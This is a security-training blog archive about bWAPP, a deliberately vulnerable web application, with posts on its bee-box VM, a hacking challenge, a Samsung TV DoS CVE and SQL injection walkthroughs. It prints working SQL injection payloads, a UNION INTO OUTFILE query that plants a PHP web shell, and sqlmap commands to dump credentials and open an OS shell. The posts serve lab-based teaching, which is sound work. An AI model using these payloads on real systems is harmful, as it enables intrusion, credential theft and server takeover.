Saturday, June 28, 2014

bWAPP, a buggy web application!

Web application security is today's most overlooked aspect of securing the infrastructure. These days, hackers are concentrating their efforts on our precious websites and web applications. Why? Websites and web applications are a very attractive target for cyber criminality and hacktivism because they are 24/7 available via the Internet. Mission-critical business applications, containing sensitive data, are often published on the Internet through a web interface. In addition, traditional firewalls and SSL provide no protection against web attacks, and systems engineers know little about these sophisticated application-level attacks…

It’s definitely time to improve our web security! Defense is needed… downloading and playing with bWAPP may be a first start… Wanted: superbees.

bWAPP, or a buggy web application, is a deliberately insecure web application. It helps security enthusiasts, systems engineers, developers and students to discover and to prevent web vulnerabilities. bWAPP prepares one to conduct successful web application penetration testing and ethical hacking projects. It is made for educational purposes.



What makes bWAPP so unique? Well, it has over 100 web bugs! bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project.

[The OWASP Top 10 provides an accurate snapshot of the current threat landscape in application security and reflects the collaborative efforts and insights of thousands of accomplished security engineers. To reflect the ongoing changes in technology and common online business practices, the list is periodically updated.]

Some of the vulnerabilities included in bWAPP:
  • SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injections
  • Blind SQL and Blind OS Command injection
  • Bash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL)
  • Cross-Site Scripting (XSS) and Cross-Site Tracing (XST)
  • Cross-Site Request Forgery (CSRF)
  • AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL)
  • Malicious, unrestricted file uploads and backdoor files
  • Authentication, authorization and session management issues
  • Arbitrary file access and directory traversals
  • Local and remote file inclusions (LFI/RFI)
  • Configuration issues: Man-in-the-Middle, cross-domain policy files, information disclosures,...
  • HTTP parameter pollution and HTTP response splitting
  • Denial-of-Service (DoS) attacks: Slow HTTP and XML Entity Expansion
  • Insecure distcc, FTP, NTP, Samba, SNMP, VNC, WebDAV configurations
  • HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues
  • Unvalidated redirects and forwards, and cookie poisoning
  • Cookie poisoning and insecure cryptographic storage
  • Server Side Request Forgery (SSRF)
  • XML External Entity attacks (XXE)
  • And much much much more…

 
 
 

bWAPP is a PHP application that uses a MySQL database. It can be hosted on Linux, Windows and Mac with Apache/IIS and MySQL. It can also be installed with WAMP or XAMPP.
Another possibility is to download the bee-box…

The bee-box is a custom Linux Ubuntu virtual machine, pre-installed with bWAPP. It is compatible with VMware Player, Workstation, Fusion, and with Oracle VirtualBox. It requires zero installation! bee-box gives you several ways to hack and deface the bWAPP website, currently there are 10 different website defacement possibilities! It's even possible to hack the bee-box, using a local privilege escalation exploit, to get full root access… Actually, with bee-box you have the opportunity to explore, and exploit, ‘all’ bWAPP vulnerabilities! Hacking, defacing and exploiting without going to jail... how cool is that?

You can download bWAPP from here. You can download bee-box from here.

Both are part of the ‘ITSEC Games’ project. The ‘ITSEC Games’ are a fun approach to IT security education. IT security, ethical hacking, training and fun... all mixed together! Our main objectives are to teach InfoSec courses from an educational and recreational point of view.

Take a look at our ‘What is bWAPP?’ introduction guide: it includes free training materials and exercises. There is also a free cheat sheet available, containing all the bWAPP solutions…
Follow @MME_IT on Twitter, and receive this cheat sheet, updated on a regular basis, including the latest hacks and security hardening tweaks.

We also offer a 2-day exclusive comprehensive web security course: 'Attacking & Defending Web Apps with bWAPP'.
This course can be scheduled on demand, at your location.
 
 




 

Have fun with this free and open source project!

Cheers, Malik Mesellem, @MME_IT

bWAPP - Metasploit Modules

Hi little bees,

In this article, I'll show you how you can find an exploit in bWAPP and port it to a Metasploit module to ease the exploitation of your loved bee-box (or any bWAPP aware box).
You probably all know the Mestasploit Framework. If you don't know it yet, you should absolutely take a look at its website and download/install it. If you're using kali linux, Metasploit is present in your beehive.

First, we need a to find a valid exploit. For now, I'll take a basic sql injection to spawn a shell/meterpreter to the box.



I'm a little lazy and basics of sql injection are out of scope, so if you don't' know how to exploit it in bWAPP you can still refer to my (killed in the beehive) bwappexploited site.

So, starting from the fact that this injection works fine well to get the current database :
 
' and 1=0 union all select 1,2,database(),4,5,6,7 -- -
 
We could abuse the SELECT INTO OUTFILE mysql statement to write a php file, our backdoor, to the webserver.
But don't forget you're injecting mysql, so mysql or a group it belongs to should have write perms on the folder where you want to write the backdoor.
An image or document folder is often a good choice as it is often used to upload images through an admin web interface.
In this case, the « images » folder is writable :) (http://yourip/bWAPP/images/)

Our payload could be something like this:

a' UNION SELECT 1, "<?php system($_GET['cmd']) ?>",1,1,1,1,1 INTO OUTFILE "/var/www/bWAPP/images/yabadooo.php" -- -

Of course, change the path if bWAPP is installed in another directory.
If our injection worked , a file named yabadooo.php containing our payload is present in the « images » folder, let's abuse it with « id » command to see which user serves our payload.



It worked ! But ... you already knew it ? ;)

To build a metasploit module, you have to answer to this question : Which steps were necessary to successfully exploit ?

In our case it's rather simple  :
1 – Login to bWAPP
2 – Post evil parameters to inject1.php

Here's the first step details:



As you can see we first connect to bWAPP to store the session cookie, then we use this cookie to login to the bWAPP.
 
Finally, in the second step, we call the hive function to login then we send the evil request to get our shell.
Metasploit generates the payload for us, just replace php commands in the sql injection by « payload.encoded » and let MSF do its job.



The big part of the job is done, you'll understand the meaning of it all while reading, I let you explore the final script.

You'll find the msf module here, just copy/paste it in MSF modules folder.
Kali users can drop it in /usr/share/metasploit-framework/modules/exploits/multi/http/ .
Start msfconsole and type :
> use exploit/multi/http/bwapp-sqli
> set RHOST <bWAPP IP ADDRESS>
> exploit -j

And magic happens :)

That's all bees,
Thanks for reading !

David Bloom
Twitter : @philophobia78

Sunday, December 22, 2013

bWAPP - Xmas Hacking Challenge

Hi little bees, do you get bored in the Christmas Holidays? No panic, stay tuned with us... this time we are organizing a free bWAPP Xmas Hacking Challenge. Nothing to win, just for fun (and for educational purposes of course).

bWAPP, or a buggy web application, is a deliberately insecure web application.
It helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities. bWAPP prepares to conduct successful penetration testing and ethical hacking projects. What makes bWAPP so unique? Well, it has over 60 web bugs! bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project!

Are you ready to get started with our Xmas Hacking Challenge? First of all, we need YOUR public IP address. E-mail us your public IP address at bWAPP [at] itsecgames.com. Once we receive your IP, we add you on our white-list and we e-mail you back all the details. Now you are ready to roll!

Tweet your solutions, findings, and screenshots to @MME_IT #bWAPP


The first five tweeters who successfully accomplished a challenge are listed on our bWAPP Hack Hall of Fame.



[ CHALLENGE 1 ]

Bug to exploit: SQL Injection - Extracting Data


A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands (sources: OWASP).



 
Your first mission is to grab and crack Santa's password using SQL injection.
A user 'Santa Claus' was added in the bWAPP database. We need the clear text password of that user...
Tweet your solutions, findings, and screenshots to @MME_IT #bWAPP.

HINT: title='+or+1+union+select+1,2,3,4,5,6,7+--+


Hack Hall of Fame:

  1. Pen Duick, @_SaxX_
  2. Twan, @TwanSec
  3. Yaser Faraj, @yaserfaraj
  4. philophobia, @philophobia78
  5. Andy Decramer, @AndyDecramer





[ CHALLENGE 2 ]

Bug to exploit: SQL Injection - Website Defacement


Your second mission is to upload a file using SQL injection. Name the file [your_name]-sqli.htm and tweet a screenshot as proof to @MME_IT #bWAPP.

Good luck... this will probably be your first (legal) website defacement!

HINT: use an automated SQL injection tool like sqlmap. sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.


Hack Hall of Fame:

  1. Twan, @TwanSec
  2. Pen Duick, @_SaxX_
  3. Yaser Faraj, @yaserfaraj
  4. philophobia, @philophobia78
  5. Andy Decramer, @AndyDecramer






[ CHALLENGE 3 ]

Bug to exploit: Server-Side Includes (SSI) Injection - Website Defacement


SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user.

The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields.

It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives, like: < ! # = / . " - > and [a-zA-Z0-9]

Another way to discover if the application is vulnerable is to verify the presence of pages with extension .stm, .shtm and .shtml. However, the lack of these type of pages does not mean that the application is protected against SSI attacks.

In any case, the attack will be successful only if the web server permits SSI execution without proper validation. This can lead to access and manipulation of file system and process under the permission of the web server process owner.

The attacker can access sensitive information, such as password files, and execute shell commands. The SSI directives are injected in input fields and they are sent to the web server. The web server parses and executes the directives before supplying the page. Then, the attack result will be viewable the next time that the page is loaded for the user's browser (sources: OWASP).

Your third mission is to create a file using SSI injection. Name the file [your_name]-ssii.htm and tweet a screenshot as proof to @MME_IT #bWAPP. Another website defacement...


Hack Hall of Fame:

  1. Twan, @TwanSec
  2. Pen Duick, @_SaxX
  3. philophobia, @philophobia78
  4. Yaser Faraj, @yaserfaraj
  5. Andy Decramer, @AndyDecramer





[ CHALLENGE 4 ]

Bug to exploit: Server-Side Includes (SSI) Injection - Spawning a Shell


Your next mission is to spawn a command shell using SSI injection. Access the /etc/passwd file from the shell, and tweet a screenshot as proof to @MME_IT #bWAPP.

HINT: our firewall is blocking only incoming traffic...


Hack Hall of Fame:

  1. Twan, @TwanSec
  2. philophobia, @philophobia78
  3. Yaser Faraj, @yaserfaraj
  4. ...
  5. ...





Saturday, August 3, 2013

Samsung TV DoS vulnerability

Recently, I discovered a DoS vulnerability on some Samsung TV devices.

The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request, and as a results, the TV reboots...

This was tested successfully on my Samsung PS50C7700 plasma TV.



CVE Number: CVE-2013-4890
Exploit Download Link: http://www.mmeit.be/exploits/samsungtv_reset.txt

In the demo, the TV is connected by Ethernet cable to a home network, and after running the exploit against the TVs IP address - a few seconds later, the TV restarts and repeats the process.

 
 
This means that a potential attacker only needs to obtain access to the LAN that the TV has joined, in order to attack it. This can be done either by breaking into a wireless access point or by infecting a computer on the same network with malware.

Feel free to make a root exploit and to hack your Samsung TV...

No we need firewall and antivirus protection for our televisions too :)
Samsung did not immediately return a request for comment. A shame...

Other articles related to this vulnerability:


You can follow me on Twitter: @MME_IT

Tuesday, July 16, 2013

bee-box - Hacking & Defacing bWAPP

The bee-box is a custom Linux Ubuntu virtual machine (VM), pre-installed with bWAPP.

bee-box is compatible with VMware Player, Workstation, Fusion, and with Oracle VirtualBox. It requires zero installation!

bee-box gives you several ways to hack and deface the bWAPP website, currently there are 10 different website defacement possibilities! It's even possible to hack the bee-box, using a local privilege escalation exploit, to get full root access… Actually, with bee-box you have the opportunity to explore, and exploit, ‘all’ bWAPP vulnerabilities! Hacking, defacing and exploiting without going to jail... how cool is that?

You can download bee-box from here.



 

These are the requirements for installing bee-box:
  • Windows, Linux or Mac OS
  • VMware Player, Workstation or Fusion

An overview of the installation steps:
  • Extract the 'rar' file.
  • Double click on the VM configuration file (bee-box.vmx), or import the VM into the VMware software.
  • Start the VM. It will login automatically.
  • Check the IP address of the VM.
  • Go to the bWAPP login page. If you browse the bWAPP root directory you will be redirected. 
    example: http://[IP]/bWAPP/
    example: http://[IP]/bWAPP/login.php
  • Login with the default bWAPP credentials, or make a new user. 
    default credentials: bee/bug
  • You are ready to explore and exploit the bee!



Some additional notes:
  • Linux credentials:
    bee/bug - root/bug
  • MySQL credentials:
    root/bug
  • Modify the Postfix settings (relayhost,...) to your environment.
    config file: /etc/postfix/main.cf
  • Take a snapshot of the VM before hacking the bee-box.
    There is also a backup of the bWAPP website (/var/www/bWAPP_BAK).
  • To reinstall the bWAPP database, delete the database with phpmyadmin
    (http://[IP]/phpmyadmin/).

    Afterwards, browse to the following page: https://[IP]/bWAPP/install.php
  • Don't upgrade the Linux operating system, you will lose all fun :)
  • Check the SecurityTube (www.securitytube.net) for some amazing hacking videos.
    Thanks Vivek!

We also offer a 2-day comprehensive web security course 'Attacking & Defending Web Apps with bWAPP'.
This course can be scheduled on demand, at your location!




This project is part of the ITSEC Games project. ITSEC Games are a fun approach to IT security education. IT security, ethical hacking, training and fun... all mixed together.
You can find more about the ITSEC Games and bWAPP projects on our blog.

Enjoy!

Regards

Malik Mesellem
@MME_IT

Monday, January 21, 2013

bWAPP - SQL injection

Is bWAPP vulnerable for SQL injection? Yes of course. This is the purpose of bWAPP, our extremely buggy web application. It has some nice injection issues... I made them intentionally, remember?

No... I will not explain in detail what SQL injection is!
A SQL injection attack is probably the easiest attack to prevent, while being one of the least protected against forms of attack. The core of the attack is that a SQL command is appended to the back end, usually through of a form field in the website or web application, with the intent of breaking the original SQL statement and then running the SQL statement that was injected into the form field. I'm sure you can find enough tutorials on the Internet about SQL injection. Here's an example of a pretty nice article.

Yes... I will explain how to exploit bWAPP using SQL injection and how to take ownership of the  database and even the underlying operating system. Definitely!



Currently there are 5 bugs in bWAPP related to SQL injection:
  • the Search page,

    where you can search for a movie(s) using a search string. The movie(s) details will be displayed as a result of your search.
     
  • the Select page,
     
    where you can select a specific movie from a drop-down list.
     
  • the Login page,

    where you can enter your credentials to login.
     
  • the Blind SQL injection page,

    where you also can search for a movie. The application will tell you if the movie exists or not. You will not see the movie details... maybe that's the reason why I called this the Blind SQL injection page :)
     
  • and where is bug number 5?

    A little challenge for you... somewhere in the application there is an issue with a SQL insertion. It's up to you to tell us where. Please give us your feedback @MME_IT.



The Search page

Here you can search for a movie(s) using a search string. The movie(s) details will be displayed as a result of your search. If you click the search button without entering any search string then all movies will be displayed.



The injection symptoms: when entering a single quote (') in the title field we receive the following message:

'Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1'

I love that message!

Here we go for some basic SQL injection fun:

blah' or 1=1--

results in all the records:



blah' or 1=2--

results in 0 records:



So the URL parameter title is definitely susceptible to SQL injection:

http://localhost/bWAPP/sqli_1.php?title=blah'+or+1=1--%20&action=search


What's next? Do you want to view some data not intended for you? I mean some real confidential information! Of course you want, let's go...

You could use the SQL union statement to merge database tables.
First of all you need to ensure that you use the same number of columns as the original SQL statement when using the SQL union statement!

blah' union select 1--

results in the following message:




After a while you will discover that you should use 6 columns:

 
blah' union select 1,1,1,1,1,1--

results in:



And that's great!
Now we can play with the field order and visualize the current database version:

blah' union select 1,DATABASE(),1,1,1,1-- 



We have found the name the of the current database name: bWAPP

Now our mission is to retrieve the table names of the current database:


blah' union select 1,table_name,1,1,1,1 from INFORMATION_SCHEMA.TABLES where table_schema=database()--



We have 3 tables: blog, movies and users. I think we should go for the data in the table users :)

We want to retrieve the column names for the table users:

blah' union select 1,column_name,1,1,1,1 from INFORMATION_SCHEMA.COLUMNS where table_name='users' and table_schema=database()--



The column names login, password, email and secret look interesting. We want those values!

blah' union select 1,login,password,email,secret,1 from users--



OK, we have the values! We exploited the underlying database by retrieving some confidential data. Apparently it seems that the password value is stored in a hashed state and cannot be retrieved. Those guys from MME are doing a great job...

After 10 seconds, 1 password was already cracked using John :p



Of course, we knew that the password for user bee was bug. I'm just trying to convince you to use complex passwords!

Let's summarize, we retrieved some data that was not intended for us. We retrieved the password hashes and we cracked a password. What's next?

Right... we will takeover the database and the underlying operating system. One of my favorite tools for doing that is sqlmap.

sqlmap is an open source pentesting tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections (source: sqlmap.org). It is written in python.



We can automate the previous commands with sqlmap.

This dumps the current database version and the database names:

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" 
--cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" --dbs




This dumps the table fields, it even cracks automatically the passwords:

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0"
-D bWAPP -T users -C login,email,password,secret --dump



Using sqlmap we also have the possibility to create a shell with the underlying operating system. Actually the tool will upload a web shell that runs your favorite OS commands. A very nice and powerful tool. Thank you Bernardo and Miroslav!

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" --os-shell



Conclusion

SQL injection can have disastrous consequences, no doubt about it.

Feel free to test for SQL injection vulnerabilities using the bWAPP web application. As you know there are 5 different bugs related to SQL injection. You can download bWAPP from here. Don't forget to set the security level to low or medium. With security level high you will notice that SQL injection is no longer applicable. With security level high we are validating every user input. This is done with the MySQL real escape string function and with prepared statements.

If you want to know more about SQL injection and tools like sqlmap, don't hesitate to subscribe for our ITSEC training. Or just invite me to your security event. It would be an honor for me to speak at your event!

Regards

Malik